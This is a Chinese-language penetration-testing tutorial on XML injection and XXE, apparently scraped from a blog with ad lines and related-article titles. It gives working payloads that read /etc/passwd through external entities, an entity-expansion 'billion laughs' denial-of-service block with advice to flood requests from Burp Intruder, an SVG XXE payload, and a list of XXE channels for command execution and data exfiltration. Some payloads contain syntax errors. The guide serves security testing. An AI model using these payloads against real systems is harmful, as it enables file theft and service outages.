黑盒渗透测试指导之XML注入
一.攻击场景
流星资源网,各类源码,游戏源码,QP源码
- 直接发送XML请求
- 描述
许多应用系统或组件均需要发送xml请求(get或post请求)到后台进行处理,通过识别前台发送至后台的xml请求,并使用代理拦截工具截取请求,利用XXE攻击方法修改xml请求体进行测试,
测试方法
首先查找直接发送xml请求的链接,例如抓到以下链接,如,https://127.0.0.1:8443/test/test.action其提交的post参数中有以下参数,如:
req=<?xml version="1.0" encoding="UTF-8">
<employees>
<employee>
<name>bcbccb.cn</name>
<sex>m</sex>
<age>30</age>
</employee>
</employees>
从参数体可以看出发送请求的内容是xml格式,这时如果系统支持回显那么可以发送以下请求:
<?xml version="1.0" encoding="UTF-8">
<!DOCTYPE mytest[
<!ELEMENT secret ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<secTest>&xxe;</secTest>
<employees>
<employee>
<name>bcbccb.cn</name>
<sex>m</sex>
<age>30</age>
</employee>
</employees>
这时可在页面中显示linux服务器中的passwd文件的内容,导致操作系统的用户名等敏感信息的泄露。
举一反三,如果你能知道某文件的绝对路径,则可查看任意文件内容。
上传xml文件
描述
许多设备允许上传xml格式的配置文件进行固件升级,如果后台代码没有做任何过滤直接解析上传的xml配置文件,那么容易导致xml注入,利用xml注入发送超大字符串进行拒绝服务攻击,最终导致设备瘫痪。
2.测试方法
遍历系统功能有所查找可上传xml格式的功能模块,随意上传一个xml,用代理拦截工具,如burpsuite进行拦截,并修改xml内容为超大字符串,如以下代码:
<?xml version="1.0" encoding="UTF-8">
<!DOCUMENT something[
<!ENTITY x0 "Developers!">
<!ENTITY x1 "&x0;&x0;">
<!ENTITY x2 "&x1;&x1;">
.......
<!ENTITY x100 "&x99;&x99;">]>
<something>&x100;</something>
用burpsuite把请求发送到intruder,启动127个线程发送大量请求。
最终查看设备是否被访问变慢,是否被拒绝服务攻击了。
- webservice接口
- 描述
由于webservice接口传输的数据主要是xml数据,因此只要前台发送xml请求,后台处理xml请求就有可能存在xml注入。
- 测试方法
除了使用如appscan,AWVS等工具进行扫描之外,还可以使用soapui之类的调试webservice的工具进行手动发送测试数据,测试方法其实和上述xml注入场景差不多,都是在发送到服务端的xml数据中插入攻击数据。
如,插入新数据,绕过登录,发送长数据造成DDOS
- 上传svg文件
某网站存在上传svg文件场景。
这时可以拦截请求,修改请求信息,插入以下代 码形成XXE注入攻击。
<!DOCUMENT svg[<!ENTITY test SYSTEM \"file:///etc/passwd\">]>
- 直接发送包含RSS文件的请求
RSS基于xml标准,是在互联网上被广泛采用的内容包装和投递协议。RSS(Really Simple Syndication)是一种描述和同步网站内容的格式,是使用最广泛的xml应用。
某网站,允许用户使用自定义的RSS,通过在文件中引用外部实体,可造成XXE攻击。
- XEE(XML实体膨胀)
主要试图通过消耗目标程序的服务器环境来进行dos攻击。这种攻击通过在xml的DOCTYPE中创建自定义实体的定义实现,比如这种定义可以在内存中生成一个比xml的原始允许大小大出很多的xml结构,来使这种攻击得以消耗网络服务器正常有效运行的必须内存资源。
如,添加如下代码:
<!DOCTYPE root[<!ENTITY test "TestString">]>
上传后,系统返回错误,回显显示TestString
上传dos攻击脚本,如这种:
<!ENTITY x1 "&x0;&x0;">
<!ENTITY x2 "&x1;&x1;">
.......
<!ENTITY x100 "&x99;&x99;">]>
观察后台cpu占用率超过100%导致系统重启。
二.影响
可能导致越权添加数据,绕过登录。另外,可能导致应用系统被拒绝服务攻击,服务器信息泄露等等。
XXE利用方式,供参考:
使用file协议访问/dev/random或/dev/zero,进行拒绝服务攻击
上传xml解析炸弹,进行拒绝服务攻击
通过file协议访问根目录来目录枚举
通过http协议访问ip+port,进行端口内网扫描探索
通过jar协议造成文件上传动作
通过expect协议执行任意命令
通过http协议外带数据
利用php协议外带数据
利用ftp协议外带数据
利用gopher协议外带数据
黑盒渗透测试指导之XML注入相关推荐
- 黑盒渗透测试指导之上传
一.攻击场景 直接上传webshell 流星资源网,各类源码分享,游戏源码,支付源码等 流星资源网 描述 许多应用系统或组件均提供文件上传功能,如果未做任何文件上传类型限制,导致可任意上传webshe ...
- 渗透分支写脚本_给小白的黑盒渗透测试作业——漏洞分析测试到安全加固建议...
概述 2016.12.22收到关于海洋网站及内网的的渗透测试项目,并对海洋CMS进行黑盒渗透测试.本次渗透测试对存在的漏洞进行了仔细的分析和测试,以了解该站点和对应的内网的安全程度,同时给出相应的安全 ...
- Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)
Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权) 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware ...
- mysql md5解密_Web渗透测试——Mysql数据库手工注入
我们之前讲到了SQL注入漏洞是一种非常危险的高危漏洞,攻击者可以利用许多工具轻而易举的获得目标站点后台管理权限,我们也介绍了许多SQL注入利用工具,有网友问我,既然可以使用工具自动注入,为什么还要用手 ...
- 渗透测试入门17之一次完整的渗透测试流程
一次完整的渗透测试流程 目录 渗透测试 信息收集 漏洞探测 漏洞利用 内网转发 内网渗透 痕迹清除 撰写渗透测试保告 渗透测试 渗透测试就是利用我们所掌握的渗透知识,对一个网站进行一步一步的渗透,发现 ...
- Web渗透测试基本流程
对于web应用的渗透测试,大致可分为三个阶段:信息收集.漏洞发现以及漏洞利用.在实践过程中需要进一步明细测试的流程,以下通过9个阶段来描述渗透测试的整个流程: 1.明确目标 1)确定范围:测试的范围, ...
- 汽车网络安全渗透测试
"转载自维克多汽车技术(上海)有限公司,作者Vector China" 产品和企业IT的融合引发了新的网络安全风险,从功能安全到数据隐私都面临潜在威胁.汽车行业正在使用各种方法进行 ...
- 渗透测试入门24之渗透测试参考书、课程、工具、认证
白帽子渗透测试入门资源:参考书.课程.工具.认证文章目录 前言 名词解析 Pwk课程与OSCP证书 CTF 工具 参考书 相关文献推荐 资源打包前言 初入渗透测试领域,过程中遇到不少错综复杂的知识,也 ...
- 小白入门黑客之渗透测试基本流程
所以全网最详细的渗透测试流程来了!!! 如果对学习黑客感兴趣的同学,可以点下方参加我们的实战训练营.从这里开始进入体系化的学习,还有小白到进阶的实战靶场,新手老手都适用 渗透测试 渗透测试其实就是通过 ...
最新文章
- 为什么博士要挤破头进高校?同一个实验室,硕士们进了大厂拿高薪
- JavaScript前端框架的思考
- 「NOI2017」泳池
- shell字体颜色应用
- 数学特级教师:数学除了做题目,我还必须让他们看这些!
- 别傻啦,不会高数,你连人话都听不懂
- intel编译器_试试吧!用 Go 写一个即时编译器(JIT)
- JS让文本以打字效果呈现出来
- ajaxsubmit php上传文件,使用ajaxSubmit方法实现多文件上传(异步)
- 维宏控制卡win7 驱动_ncstudio(维宏控制系统)64位下载v5.4.86[百度网盘资源] - 软件学堂...
- godot python_godot新手教程2[godot常用代码用法]
- ps文件太大无法保存?
- uva1391Astronauts【2-SAT】
- C# 将word/ppt文档转换为Pdf的三种方法
- rails开发利器:视频播放插件plugin(如何开发一个简单的插件)
- 机器学习常用专业术语(英汉)
- 「信号机制」Python信号处理—signal模块
- vue v-if 加key值的作用
- zoom手机设置分组讨论,zoom分组讨论功能在哪里
- 专升本第六讲 (世界的“小伙伴儿”都认识了)
热门文章
- oracle %date 0 10%,oracle database 10.2.0.5.0升级到10.2.0.5.22方法(for windows)
- DELL R510服务器RAID配置,Dell服务器硬RAID配置
- 报错:<ly-tab> - did you register the component correctly? For recursive components, make sure to provi
- 说说汉古中医对新型冠状病毒感染的认识和防治
- 35幅非常漂亮的夜景摄影作品欣赏
- 推荐一本书《亚马逊网络书店传奇》
- 桌面壁纸 Lively wallpape
- Win10系统无法启动的最终解决方案
- N的阶乘递归与非递归
- 如何快速高效的刷Leetcode